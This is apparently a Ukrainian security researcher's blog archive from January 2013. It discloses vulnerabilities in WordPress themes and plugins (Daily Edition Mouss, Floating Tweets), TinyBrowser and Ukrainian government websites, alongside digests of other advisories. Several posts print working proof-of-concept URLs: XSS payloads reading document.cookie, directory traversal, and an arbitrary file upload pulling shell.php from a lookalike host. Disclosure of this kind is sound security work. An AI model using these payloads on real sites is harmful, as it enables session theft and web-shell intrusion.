Архів для категорії 'Уразливості'

Уразливості на zpd.gov.ua

17:21 23.01.2013

21.07.2012

Сьогодні я знайшов Cross-Site Scripting уразливості на http://zpd.gov.ua - сайті Державної служби України з питань захисту персональних даних. Про що найближчим часом сповіщу адміністрацію сайта.

Сайт використовує Megapolis.Portal Manager, в якому я виявив багато уразливостей (з 2006 по 2012 рік я знайшов чимало дірок в цьому движку). Тому й на ньому також є дірки подібно до сайтів Кабміну, Парламенту та іншим державним сайтам.

І це сайт тієї служби, що захищає персональні дані українців. Риторичне запитання: раз ця служба штрафує за недотримання закону про захист персональних даних, то чи оштрафує вона сама себе, якщо через дірки на їхньому сайті станеться витік персональних даних.

Детальна інформація про уразливості з’явиться пізніше.

23.01.2013

XSS:

Дані уразливості досі не виправлені. Якщо ця служба не може убезпечити власний сайт, то навряд чи вона зможе убезпечити персональні дані громадян України.

IL, XSS, FPD, AoF, DoS і AFU уразливості в темі Daily Edition Mouss для WordPress

23:51 21.01.2013

У січні, 13.01.2013, я знайшов Information Leakage, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Daily Edition Mouss для WordPress.

Раніше була оприлюднена SQL Injection уразливість в Daily Edition Mouss. В якій я знайшов багато нових дірок. Схоже, що це тема Daily Edition від WooThemes, про дірки в якій я писав в 2011 році. Тому окрім SQL injection, в цій темі багато інших уразливостей.

Information Leakage (SQL DB Structure Extraction) (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://flickr.com.site.com/shell.php

AoF, DoS, AFU уразливості не працюють в останній версії теми (в якій я тестував їх). Це може бути в зв’язку з захистом від AFU дірки в TimThumb. Але вони повинні працювати в ранніх версіях цієї теми.

Уразливі всі версії теми Daily Edition Mouss для WordPress.

Добірка уразливостей

17:26 21.01.2013

В даній добірці уразливості в веб додатках:

  • HP Operations Orchestration, Remote Execution of Arbitrary Code (деталі)
  • Remote code execution and other vulnerabilities in MAKETEXT macro (деталі)
  • Open-Realty CMS 3.x | Cross Site Request Forgery (CSRF) Vulnerability (деталі)
  • CubeCart 3.0.20 (3.0.x) and lower | Multiple Cross Site Scripting Vulnerabilities (деталі)
  • WingFTP Server Denial of Service Vulnerability (деталі)
  • CubeCart 3.0.20 (3.0.x) and lower | Arbitrary File Upload (деталі)
  • CubeCart 3.0.20 (3.0.x) and lower | Multiple SQL Injection Vulnerabilities (деталі)
  • Key Systems Electronic Key Lockers command injection and weak authentication vulnerabilities (деталі)
  • CubeCart 4.4.6 and lower | Open URL Redirection Vulnerability (деталі)
  • CubeCart 5.0.7 and lower | Open URL Redirection Vulnerability (деталі)

Уразливості в плагінах для WordPress №87

23:58 12.01.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Video Lead Form, Dailyedition mouss та Ads Box. Для котрих з’явилися експлоіти. Video Lead Form - це плагін для розміщення форми замовлення у відео, Dailyedition mouss - це тема движка, Ads Box - це плагін для розміщення реклами.

  • Video Lead Form Plugin Cross-Site Scripting Vulnerabilities which affects Wordpress URL (деталі)
  • WordPress Dailyedition-mouss SQL Injection (деталі)
  • WordPress Ads Box SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в Floating Tweets для WordPress

23:58 11.01.2013

30.08.2012

У серпні, 16.08.2012, я виявив Full path disclosure, Directory Traversal та Cross-Site Scripting уразливості в плагіні Floating Tweets для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Rokbox.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

11.01.2013

Full path disclosure (WASC-13):

http://site/wp-content/plugins/floating-tweets/dcwp_floating_tweets.php
http://site/wp-content/plugins/floating-tweets/dcwp_floating_tweets_widget.php
http://site/wp-content/plugins/floating-tweets/skin.php?skin=1

Directory Traversal (Windows) (WASC-33):

http://site/wp-content/plugins/floating-tweets/skin.php?widget_id=2&skin=1\1

DT дозволяє зчитувати лише css-файли (в папці /skins/ та підпапках). При відключених mq можна використати Null Byte Injection, що дозволить через DT зчитувати довільні файли.

XSS (persistent XSS) (WASC-08):

Три persistent XSS дірки. Для атаки потрібно обійти захист від CSRF (параметр savewidgets). Наприклад, використовуючи reflected XSS.

Floating Tweets XSS.html

Floating Tweets XSS-2.html

Floating Tweets XSS-3.html

Приклади атак для даних трьох XSS на IE7 та попереді версії. З використанням MouseOverJacking можна атакувати будь-які браузери (при цьому жертва повинна зробити рух мишкою). Код спрацює одразу при відправці запита і в подальшому при відвідуванні http://site/wp-admin/widgets.php.

Floating Tweets XSS-4.html

Приклад атаки на будь-які браузери. Код виконається на головній і будь-якій зовнішній сторінці сайта.

Уразливі Floating Tweets 1.0.1 та попередні версії.

Добірка уразливостей

17:26 10.01.2013

В даній добірці уразливості в веб додатках:

  • EMC NetWorker Format String Vulnerability (деталі)
  • Multiple SQL Injection Vulnerabilities in Elite Bulletin Board (деталі)
  • Multiple vulnerabilities in Banana Dance (деталі)
  • Symantec Messaging Gateway SSH with backdoor user account (деталі)
  • Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability (деталі)
  • mahara security update (деталі)
  • Symantec Messaging Gateway - Support Backdoor (деталі)
  • MoinMoin vulnerabilities (деталі)
  • mediawiki-extensions security update (деталі)
  • Open-Realty CMS 3.x | Persistent Cross Site Scripting (XSS) Vulnerability (деталі)

Уразливості в плагінах для WordPress №86

23:57 09.01.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Simple Gmail Login, List Communities та ArribaLaEsteban. Для котрих з’явилися експлоіти. Simple Gmail Login - це плагін для аутентифікації через логін і пароль до Gmail, List Communities - це плагін для створення спільнот, ArribaLaEsteban - це тема движка.

  • Wordpress Plugin Simple Gmail Login Stack Trace Vulnerability (деталі)
  • WordPress List Communities SQL Injection (деталі)
  • WordPress ArribaLaEsteban SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в TinyBrowser

23:54 08.01.2013

У грудні, 28.12.2012, я знайшов численні уразливості в TinyBrowser для TinyMCE. Це Information Leakage, Full path disclosure та Cross-Site Scripting уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про Виконання коду в TinyBrowser.

Information Leakage (Directory Listing) (WASC-13):

http://site/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=

http://site/tiny_mce/plugins/tinybrowser/edit.php?type=

Виводиться зміст коренової директорії сайта, якщо немає директорії для завантаження.

Full path disclosure (WASC-13):

В tinybrowser.php і edit.php виводиться FPD якщо немає папки для завантаження.

Якщо завантажити скрипт з розширенням зображення, то також випадають FPD.

XSS (WASC-08):

http://site/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)//

Для IE:

http://site/tiny_mce/plugins/tinybrowser/upload.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))

Уразливі старі версії TinyBrowser (такі як 1.33 та попередні версії). В версії TinyBrowser 1.42 дані уразливості вже виправлені.

Добірка уразливостей

17:24 08.01.2013

В даній добірці уразливості в веб додатках:

  • (0Day) HP Operations Orchestration RSScheduler Service JDBC Connector Remote Code Execution Vulnerability (деталі)
  • SimpleInvoices 2011.1 Cross-Site-Scripting (XSS) Vulnerabilities (деталі)
  • Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework (деталі)
  • Dr. Web Control Center Admin UI Remote Script Code Injection (деталі)
  • Path Traversal Vulnerability on Secure Transport versions 5.1 SP2 and earlier (деталі)
  • FCKEditor File Upload Vulnerability (деталі)
  • OpenStack Keystone vulnerabilities (деталі)
  • File Upload Concern in Front Account 2.3.13 and OpenDocMan 1.2.6.2 (деталі)
  • OpenDocMan 1.2.6.2 - 3 Vulnerabilities (деталі)
  • Addressbook v8.1.24.1 Group Name XSS (деталі)

Нові уразливості на portal.rada.gov.ua

16:28 31.12.2012

12.07.2012

Сьогодні я знайшов Cross-Site Scripting уразливості на http://portal.rada.gov.ua - сайті Верховної Ради України. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже неодноразово писав про дірки на сайті Парламенту. В останнє - коли писав про уразливості на kmu.gov.ua, rada.gov.ua та president.gov.ua, а також я неодноразово писав про дірки та взломи на різних піддоменах rada.gov.ua.

Детальна інформація про уразливості з’явиться пізніше.

31.12.2012

XSS:

Дані уразливості досі не виправлені.